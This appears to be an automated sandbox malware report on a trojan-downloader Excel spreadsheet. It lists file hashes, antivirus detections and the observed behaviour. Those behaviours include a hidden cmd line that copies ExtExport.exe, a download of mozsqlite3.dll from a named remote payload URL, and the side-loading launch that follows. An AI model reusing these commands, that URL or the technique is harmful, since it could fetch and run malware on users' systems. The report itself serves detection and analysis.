Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	June 15, 2021, 9:20 p.m.	June 15, 2021, 9:22 p.m.

Size	187.0KB
Type	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Windows User, Last Saved By: Windows User, Name of Creating Application: Microsoft Excel, Create Time/Date: Tue Jun 1 12:24:56 2021, Last Saved Time/Date: Tue Jun 1 12:24:57 2021, Security: 1
MD5	`c41a21a821bcdea1d3ab26ebef055eed`
SHA256	`d1d0ac76e59b9e2a8ae3a433e0186d74fc61417c89fe5ee4b93c02faa1dc58f8`
CRC32	`1679CE4F`
ssdeep	`3072:Ghtf+HhTi14PyY63IbwFHKzke41kwph4FW20vKaCLyPKlogs9FlNrk5aWADzS1+5:GzW5i146r3tqwN1fzK8vLC2PKlhwFlNl`
Yara	Microsoft_Office_File_Zero - Microsoft Office File

EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE" C:\Users\test22\AppData\Local\Temp\document-37-1849.xls
1116
- cmd.exe "C:\Windows\System32\cmd.exe" /c copy "%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe" C:\ycjqFXSM\kO2NIybn\pDImcT.exe
  2408
- pDImcT.exe "C:\ycjqFXSM\kO2NIybn\pDImcT.exe" C:\ycjqFXSM\kO2NIybn ALHJ zqtRI
  1472

Name	Response	Post-Analysis Lookup
austinheisey.com	A 51.195.123.188	51.195.123.188

IP Address	Status	Action
164.124.101.2	Active	Moloch
51.195.123.188	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW June 15, 2021, 9:21 p.m.	buffer: 1 file(s) copied. console_handle: 0x00000007	1	1	0

Allocates read-write-execute memory (usually to unpack itself) (14 events)

Time & API	Arguments	Status
NtProtectVirtualMemory June 15, 2021, 9:20 p.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dce1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 15, 2021, 9:20 p.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dd3f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 15, 2021, 9:20 p.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dd3f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 15, 2021, 9:20 p.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74f41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 15, 2021, 9:20 p.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75241000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 15, 2021, 9:20 p.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75111000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 15, 2021, 9:20 p.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73321000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 15, 2021, 9:20 p.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dbf1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 15, 2021, 9:20 p.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dbe1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 15, 2021, 9:20 p.m.	process_identifier: 1116 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6dba1000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2021, 9:21 p.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05950000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2021, 9:21 p.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05950000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2021, 9:21 p.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x062f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 15, 2021, 9:21 p.m.	process_identifier: 1116 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06300000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\ycjqFXSM\kO2NIybn\mozsqlite3.dll

Creates a suspicious process (1 event)

cmdline

"C:\Windows\System32\cmd.exe" /c copy "%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe" C:\ycjqFXSM\kO2NIybn\pDImcT.exe

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW June 15, 2021, 9:21 p.m.	show_type: 0 filepath_r: cmd parameters: /c copy "%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe" C:\ycjqFXSM\kO2NIybn\pDImcT.exe filepath: cmd	1	1	0
ShellExecuteExW June 15, 2021, 9:21 p.m.	show_type: 0 filepath_r: C:\ycjqFXSM\kO2NIybn\pDImcT.exe parameters: C:\ycjqFXSM\kO2NIybn ALHJ zqtRI filepath: C:\ycjqFXSM\kO2NIybn\pDImcT.exe	1	1	0

File has been identified by 7 AntiVirus engines on VirusTotal as malicious (7 events)

Kaspersky	HEUR:Trojan.MSOffice.Generic
BitDefender	Trojan.GenericKD.37017428
McAfee-GW-Edition	Artemis!Trojan
AegisLab	Trojan.MSOffice.Generic.4!c
Microsoft	TrojanDownloader:O97M/Encdoc.EPB!MTB
ALYac	Trojan.Downloader.XLS.gen
MAX	malware (ai score=85)

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	"C:\Windows\System32\cmd.exe" /c copy "%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe" C:\ycjqFXSM\kO2NIybn\pDImcT.exe
cmdline	cmd /c copy "%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe" C:\ycjqFXSM\kO2NIybn\pDImcT.exe

A command shell or script process was created by an unexpected parent process (1 event)

parent_process

excel.exe

martian_process

cmd /c copy "%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe" C:\ycjqFXSM\kO2NIybn\pDImcT.exe

Network communications indicative of a potential document or script payload download was initiated by the process excel.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
URLDownloadToFileW June 15, 2021, 9:21 p.m.	url: https://austinheisey.com/xls/black/index/processingSetRequestDownloadPayloader/?servername=excel stack_pivoted: 0 filepath_r: C:\ycjqFXSM\kO2NIybn\mozsqlite3.dll filepath: C:\ycjqFXSM\kO2NIybn\mozsqlite3.dll		2148270085	0

One or more non-whitelisted processes were created (4 events)

parent_process	excel.exe	martian_process	"C:\ycjqFXSM\kO2NIybn\pDImcT.exe" C:\ycjqFXSM\kO2NIybn ALHJ zqtRI
parent_process	excel.exe	martian_process	"C:\Windows\System32\cmd.exe" /c copy "%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe" C:\ycjqFXSM\kO2NIybn\pDImcT.exe
parent_process	excel.exe	martian_process	cmd /c copy "%ProgramFiles(x86)%\Internet Explorer\ExtExport.exe" C:\ycjqFXSM\kO2NIybn\pDImcT.exe
parent_process	excel.exe	martian_process	C:\ycjqFXSM\kO2NIybn\pDImcT.exe C:\ycjqFXSM\kO2NIybn ALHJ zqtRI

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

51.195.123.188:443

The process excel.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Windows\System32\cmd.exe

document-37-1849.xls

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All